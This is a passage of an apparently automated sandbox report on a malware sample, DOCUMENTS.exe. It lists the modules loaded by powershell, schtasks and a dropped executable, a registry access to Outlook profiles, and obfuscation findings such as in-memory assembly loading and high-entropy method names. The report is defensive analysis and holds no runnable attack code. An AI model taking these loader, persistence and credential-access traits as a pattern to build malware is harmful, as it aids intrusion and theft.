                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: DOCUMENTS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DOCUMENTS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: DOCUMENTS.exe, MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: DOCUMENTS.exe, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: bgURAojpNNIb.exe.1.dr, MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: bgURAojpNNIb.exe.1.dr, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.cs.Net Code: UHAZkFwJKI System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.DOCUMENTS.exe.2d92488.0.raw.unpack, SQL.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.DOCUMENTS.exe.6f20000.5.raw.unpack, SQL.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.cs.Net Code: UHAZkFwJKI System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.cs.Net Code: UHAZkFwJKI System.Reflection.Assembly.Load(byte[])
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06693AD7 push ebx; retf 13_2_06693ADA
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714CB59 pushfd ; ret 14_2_0714CB61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F73AD7 push ebx; retf 18_2_05F73ADA
                      Source: DOCUMENTS.exeStatic PE information: section name: .text entropy: 7.931627472756141
                      Source: bgURAojpNNIb.exe.1.drStatic PE information: section name: .text entropy: 7.931627472756141
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.csHigh entropy of concatenated method names: 'RmW9wMr1Kw', 'HNd9tTvrBH', 'drt9SIWftM', 'N1G9ESSXKx', 'vYj9L805Fn', 'nH09y9fQwr', 'g2n9gRK3oj', 'WgM9XfDBau', 'QnG9rBQUMN', 'OZ79b4Jl2u'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, CqkSLPQiyRDSGvpgix.csHigh entropy of concatenated method names: 'IA9Kv9bul2', 'TDGK0qQB5m', 'FshKMa7bPO', 'ctEKPFsAxg', 'B2ZKTPIEB5', 'K0MK5jy9xl', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, FmqJHSBUqwQ8k8Y35x.csHigh entropy of concatenated method names: 'HhZVRD33cv', 'xmtV92HqMD', 'nUGVZqOQUi', 'j3fVt7lx1l', 'RiwVS5cUAr', 'DFPVL5BN91', 'QRdVyh6485', 'xJTKsvk4aY', 'vgJKYj10Xi', 'JHWKpu0mvr'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IGjS0iv8mM3ch1TwcX.csHigh entropy of concatenated method names: 'wDxRgJai9c', 'eKfRXal9sM', 'HTBRbcGIlB', 'DAnRnIjeHJ', 'pggRi9lswZ', 'fwxRed4SNf', 'drZaatdK5AHA9bSgst', 'Qtx6FSYZXfmZCEl4y2', 'qy1RRpWLK1', 'vXnR9eM2lT'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, nuFdc3YgMd8jqlL8i7D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLWDT0bQJE', 'mLeDO4eWJJ', 'dnyDJwP0AG', 'wfjDch7kXw', 'rFeDuwh4Ep', 'wBEDIQTM4Z', 'aTLDs2o1k0'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, XDn3FpsXEn90n0HiPU.csHigh entropy of concatenated method names: 'Y1QgCvhYhh', 'aW4gG2ES3n', 'uu8gk3VZwN', 'I0agx7QMOt', 'zv7gW1p7Wm', 'hl7g2WhUmk', 'Koyg8n1kGg', 'EI8gmeVq0n', 'BWRgHefVOH', 'PpUg1UcR4j'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, xmOcDpHNNX8lBExIDd.csHigh entropy of concatenated method names: 'oILLWGWEo1', 'wNuL8E7RuY', 'iCXEM6uoBy', 'js0EPxXMLM', 'SLTE5Om7NR', 'TZrEdVJMmQ', 'L4ZEhsOZiK', 'VTwENcTx20', 'OD8E6krOgJ', 'iFsEqBK5jT'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, iHtn2JKYOqRtpcQHmC.csHigh entropy of concatenated method names: 'Pvy3YKDuJl', 'nay3QI5QEo', 'BlFKUlLBQT', 'f7KKRBsIqJ', 'V4W3lLcmZq', 'A333oJkRbd', 'SQG37OSIIf', 'rB43TEF6vI', 'KrD3ONM7Wb', 'tCV3J3KQvf'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, dpJ4X47JnBRnja5sBA.csHigh entropy of concatenated method names: 'FQ8Ktt1Gg2', 'aKVKSaWkey', 'bZAKEowFvP', 'dHBKL74V1A', 'E3kKytTypC', 'QZjKgpuasS', 'UAGKXge7EN', 'FIYKryV22a', 'CynKbVbGCo', 'QkdKntVNhy'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, qWCsH5q5S6cIyfTUWn.csHigh entropy of concatenated method names: 'UVQExdQmri', 'P3IE2tpuIP', 'j2ZEmokpas', 'PbyEHZwXOk', 'klNEipkch0', 'DptEepxruU', 'kHME3YgdaQ', 'HO7EKK0Ycu', 'hewEVsIA6L', 'FQuEDLnh3m'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, itavA5064CpfMkCRx8.csHigh entropy of concatenated method names: 'Dispose', 'gi6Rp0gVot', 'yjpF0ggf9a', 'qCtff7xLHB', 'y3URQILg6c', 'Nt7RzIaZei', 'ProcessDialogKey', 'lTXFUploL3', 'APxFRHvtNd', 'T0YFFYFkID'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, c6Xl83zSDdmAH1RGoD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'se1VaI6HHE', 'NkwVitp3v5', 'ursVeXhB4e', 'c0FV34xfSm', 'bZ0VKTRwAU', 'uNOVV0XcEt', 'VRbVDQvcj7'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, oDEPGtaZ6ry5IcnYBf.csHigh entropy of concatenated method names: 'XTYST6Bi8d', 'uYnSOnJgNW', 'sM7SJGRQE5', 'b2UScV4tH3', 'jKASuYpDB5', 'fZrSI1U1hm', 'cllSsG54jD', 'uTeSYOQn4n', 'xn1Spus5Au', 'eDLSQcubdD'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, oPRCmrAx6DKALUJu4K.csHigh entropy of concatenated method names: 'VVM3bts0gv', 'AFK3n1jdty', 'ToString', 'TZS3tmAhSh', 'Kxg3SN47hj', 'Uft3EyXyrm', 'OC43LclFFu', 'iGc3yDhDFi', 'O103gG5h8k', 'qjL3XsutDx'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, ElQsm1Z1Vvnmg6hSYw.csHigh entropy of concatenated method names: 'X0DiqM2aLG', 'g31iortRwN', 'm26iTjCNLF', 'rnciOrSAUJ', 'U9Di0wamhe', 'fM2iMZ9l5i', 'sgJiPryiwT', 'CN5i5hlvhm', 'Q5bid2FYg6', 'QyBihETmpL'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, abfOueY15F0v0aZ5JmG.csHigh entropy of concatenated method names: 'lwZVCfS2OT', 'OECVGXBxxL', 'krXVkkkCDl', 'zyPVxXtVvd', 'aB1VWBODg1', 'YkpV2ruoh0', 'mMZV8OMvEF', 'UEcVm3Uf88', 'v4ZVHbbjnL', 'j74V1xDTA8'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, Q2fehlnnO9kNBjg725.csHigh entropy of concatenated method names: 'O4GamZBUsB', 'cKqaHwf9Hd', 'KyYavLSZnb', 'XCEa0GciGK', 'lsAaPUoJih', 'i15a5vJIOa', 'zvcahihFdc', 'a48aNj5E40', 'NMxaqa3AhH', 'Qnial6iTMt'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, Cu0XhNdbCSE50TeKpT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oOMFpy2IfL', 'FXgFQCl15K', 'CwKFzvCgKU', 'yin9UKlrAJ', 'ReA9RrEu5l', 'rcH9Flbx58', 'tdN9952IZ0', 'SiwYcmx2TF9FEseluVx'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, mb0GRbFFLjLV5BDW7f.csHigh entropy of concatenated method names: 'gnGyw7L2ty', 'R0jySKNs9L', 'NAWyLhtc1H', 'KOCyg1lAUi', 'U8gyXMsqCk', 'ITuLuSFlxs', 'krNLIE7ggF', 'tYRLsdWeDb', 'PlILYXA3kF', 'sAoLps2DXp'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, aQ22UkNAfMBbqUNii2.csHigh entropy of concatenated method names: 'sJ5kNkWDG', 'ReaxGqukX', 'gkN25xnvL', 'wqe8NU86G', 'IoaHmvWnD', 'Ocy1rI95f', 'RRkTKk8d94ouZ1j2LQ', 'woANyjbUl0LpOaC0U3', 'SkfKOdafs', 'otPDMpxi2'
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, ySxHLLb1AFMFrZukA4.csHigh entropy of concatenated method names: 'fSlgthrAZC', 'aXBgEjAAmn', 'Xfegypu0kV', 'rP3yQJvTta', 'PGYyzUorG0', 'v8ggUAs43q', 'kMdgRA0fOj', 'BclgFJNhaj', 'rUng9i6LZs', 'RsegZ811Ad'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.csHigh entropy of concatenated method names: 'RmW9wMr1Kw', 'HNd9tTvrBH', 'drt9SIWftM', 'N1G9ESSXKx', 'vYj9L805Fn', 'nH09y9fQwr', 'g2n9gRK3oj', 'WgM9XfDBau', 'QnG9rBQUMN', 'OZ79b4Jl2u'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, CqkSLPQiyRDSGvpgix.csHigh entropy of concatenated method names: 'IA9Kv9bul2', 'TDGK0qQB5m', 'FshKMa7bPO', 'ctEKPFsAxg', 'B2ZKTPIEB5', 'K0MK5jy9xl', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, FmqJHSBUqwQ8k8Y35x.csHigh entropy of concatenated method names: 'HhZVRD33cv', 'xmtV92HqMD', 'nUGVZqOQUi', 'j3fVt7lx1l', 'RiwVS5cUAr', 'DFPVL5BN91', 'QRdVyh6485', 'xJTKsvk4aY', 'vgJKYj10Xi', 'JHWKpu0mvr'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IGjS0iv8mM3ch1TwcX.csHigh entropy of concatenated method names: 'wDxRgJai9c', 'eKfRXal9sM', 'HTBRbcGIlB', 'DAnRnIjeHJ', 'pggRi9lswZ', 'fwxRed4SNf', 'drZaatdK5AHA9bSgst', 'Qtx6FSYZXfmZCEl4y2', 'qy1RRpWLK1', 'vXnR9eM2lT'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, nuFdc3YgMd8jqlL8i7D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLWDT0bQJE', 'mLeDO4eWJJ', 'dnyDJwP0AG', 'wfjDch7kXw', 'rFeDuwh4Ep', 'wBEDIQTM4Z', 'aTLDs2o1k0'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, XDn3FpsXEn90n0HiPU.csHigh entropy of concatenated method names: 'Y1QgCvhYhh', 'aW4gG2ES3n', 'uu8gk3VZwN', 'I0agx7QMOt', 'zv7gW1p7Wm', 'hl7g2WhUmk', 'Koyg8n1kGg', 'EI8gmeVq0n', 'BWRgHefVOH', 'PpUg1UcR4j'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, xmOcDpHNNX8lBExIDd.csHigh entropy of concatenated method names: 'oILLWGWEo1', 'wNuL8E7RuY', 'iCXEM6uoBy', 'js0EPxXMLM', 'SLTE5Om7NR', 'TZrEdVJMmQ', 'L4ZEhsOZiK', 'VTwENcTx20', 'OD8E6krOgJ', 'iFsEqBK5jT'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, iHtn2JKYOqRtpcQHmC.csHigh entropy of concatenated method names: 'Pvy3YKDuJl', 'nay3QI5QEo', 'BlFKUlLBQT', 'f7KKRBsIqJ', 'V4W3lLcmZq', 'A333oJkRbd', 'SQG37OSIIf', 'rB43TEF6vI', 'KrD3ONM7Wb', 'tCV3J3KQvf'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, dpJ4X47JnBRnja5sBA.csHigh entropy of concatenated method names: 'FQ8Ktt1Gg2', 'aKVKSaWkey', 'bZAKEowFvP', 'dHBKL74V1A', 'E3kKytTypC', 'QZjKgpuasS', 'UAGKXge7EN', 'FIYKryV22a', 'CynKbVbGCo', 'QkdKntVNhy'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, qWCsH5q5S6cIyfTUWn.csHigh entropy of concatenated method names: 'UVQExdQmri', 'P3IE2tpuIP', 'j2ZEmokpas', 'PbyEHZwXOk', 'klNEipkch0', 'DptEepxruU', 'kHME3YgdaQ', 'HO7EKK0Ycu', 'hewEVsIA6L', 'FQuEDLnh3m'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, itavA5064CpfMkCRx8.csHigh entropy of concatenated method names: 'Dispose', 'gi6Rp0gVot', 'yjpF0ggf9a', 'qCtff7xLHB', 'y3URQILg6c', 'Nt7RzIaZei', 'ProcessDialogKey', 'lTXFUploL3', 'APxFRHvtNd', 'T0YFFYFkID'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, c6Xl83zSDdmAH1RGoD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'se1VaI6HHE', 'NkwVitp3v5', 'ursVeXhB4e', 'c0FV34xfSm', 'bZ0VKTRwAU', 'uNOVV0XcEt', 'VRbVDQvcj7'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, oDEPGtaZ6ry5IcnYBf.csHigh entropy of concatenated method names: 'XTYST6Bi8d', 'uYnSOnJgNW', 'sM7SJGRQE5', 'b2UScV4tH3', 'jKASuYpDB5', 'fZrSI1U1hm', 'cllSsG54jD', 'uTeSYOQn4n', 'xn1Spus5Au', 'eDLSQcubdD'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, oPRCmrAx6DKALUJu4K.csHigh entropy of concatenated method names: 'VVM3bts0gv', 'AFK3n1jdty', 'ToString', 'TZS3tmAhSh', 'Kxg3SN47hj', 'Uft3EyXyrm', 'OC43LclFFu', 'iGc3yDhDFi', 'O103gG5h8k', 'qjL3XsutDx'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, ElQsm1Z1Vvnmg6hSYw.csHigh entropy of concatenated method names: 'X0DiqM2aLG', 'g31iortRwN', 'm26iTjCNLF', 'rnciOrSAUJ', 'U9Di0wamhe', 'fM2iMZ9l5i', 'sgJiPryiwT', 'CN5i5hlvhm', 'Q5bid2FYg6', 'QyBihETmpL'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, abfOueY15F0v0aZ5JmG.csHigh entropy of concatenated method names: 'lwZVCfS2OT', 'OECVGXBxxL', 'krXVkkkCDl', 'zyPVxXtVvd', 'aB1VWBODg1', 'YkpV2ruoh0', 'mMZV8OMvEF', 'UEcVm3Uf88', 'v4ZVHbbjnL', 'j74V1xDTA8'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, Q2fehlnnO9kNBjg725.csHigh entropy of concatenated method names: 'O4GamZBUsB', 'cKqaHwf9Hd', 'KyYavLSZnb', 'XCEa0GciGK', 'lsAaPUoJih', 'i15a5vJIOa', 'zvcahihFdc', 'a48aNj5E40', 'NMxaqa3AhH', 'Qnial6iTMt'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, Cu0XhNdbCSE50TeKpT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oOMFpy2IfL', 'FXgFQCl15K', 'CwKFzvCgKU', 'yin9UKlrAJ', 'ReA9RrEu5l', 'rcH9Flbx58', 'tdN9952IZ0', 'SiwYcmx2TF9FEseluVx'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, mb0GRbFFLjLV5BDW7f.csHigh entropy of concatenated method names: 'gnGyw7L2ty', 'R0jySKNs9L', 'NAWyLhtc1H', 'KOCyg1lAUi', 'U8gyXMsqCk', 'ITuLuSFlxs', 'krNLIE7ggF', 'tYRLsdWeDb', 'PlILYXA3kF', 'sAoLps2DXp'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, aQ22UkNAfMBbqUNii2.csHigh entropy of concatenated method names: 'sJ5kNkWDG', 'ReaxGqukX', 'gkN25xnvL', 'wqe8NU86G', 'IoaHmvWnD', 'Ocy1rI95f', 'RRkTKk8d94ouZ1j2LQ', 'woANyjbUl0LpOaC0U3', 'SkfKOdafs', 'otPDMpxi2'
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, ySxHLLb1AFMFrZukA4.csHigh entropy of concatenated method names: 'fSlgthrAZC', 'aXBgEjAAmn', 'Xfegypu0kV', 'rP3yQJvTta', 'PGYyzUorG0', 'v8ggUAs43q', 'kMdgRA0fOj', 'BclgFJNhaj', 'rUng9i6LZs', 'RsegZ811Ad'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.csHigh entropy of concatenated method names: 'RmW9wMr1Kw', 'HNd9tTvrBH', 'drt9SIWftM', 'N1G9ESSXKx', 'vYj9L805Fn', 'nH09y9fQwr', 'g2n9gRK3oj', 'WgM9XfDBau', 'QnG9rBQUMN', 'OZ79b4Jl2u'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, CqkSLPQiyRDSGvpgix.csHigh entropy of concatenated method names: 'IA9Kv9bul2', 'TDGK0qQB5m', 'FshKMa7bPO', 'ctEKPFsAxg', 'B2ZKTPIEB5', 'K0MK5jy9xl', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, FmqJHSBUqwQ8k8Y35x.csHigh entropy of concatenated method names: 'HhZVRD33cv', 'xmtV92HqMD', 'nUGVZqOQUi', 'j3fVt7lx1l', 'RiwVS5cUAr', 'DFPVL5BN91', 'QRdVyh6485', 'xJTKsvk4aY', 'vgJKYj10Xi', 'JHWKpu0mvr'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IGjS0iv8mM3ch1TwcX.csHigh entropy of concatenated method names: 'wDxRgJai9c', 'eKfRXal9sM', 'HTBRbcGIlB', 'DAnRnIjeHJ', 'pggRi9lswZ', 'fwxRed4SNf', 'drZaatdK5AHA9bSgst', 'Qtx6FSYZXfmZCEl4y2', 'qy1RRpWLK1', 'vXnR9eM2lT'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, nuFdc3YgMd8jqlL8i7D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLWDT0bQJE', 'mLeDO4eWJJ', 'dnyDJwP0AG', 'wfjDch7kXw', 'rFeDuwh4Ep', 'wBEDIQTM4Z', 'aTLDs2o1k0'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, XDn3FpsXEn90n0HiPU.csHigh entropy of concatenated method names: 'Y1QgCvhYhh', 'aW4gG2ES3n', 'uu8gk3VZwN', 'I0agx7QMOt', 'zv7gW1p7Wm', 'hl7g2WhUmk', 'Koyg8n1kGg', 'EI8gmeVq0n', 'BWRgHefVOH', 'PpUg1UcR4j'
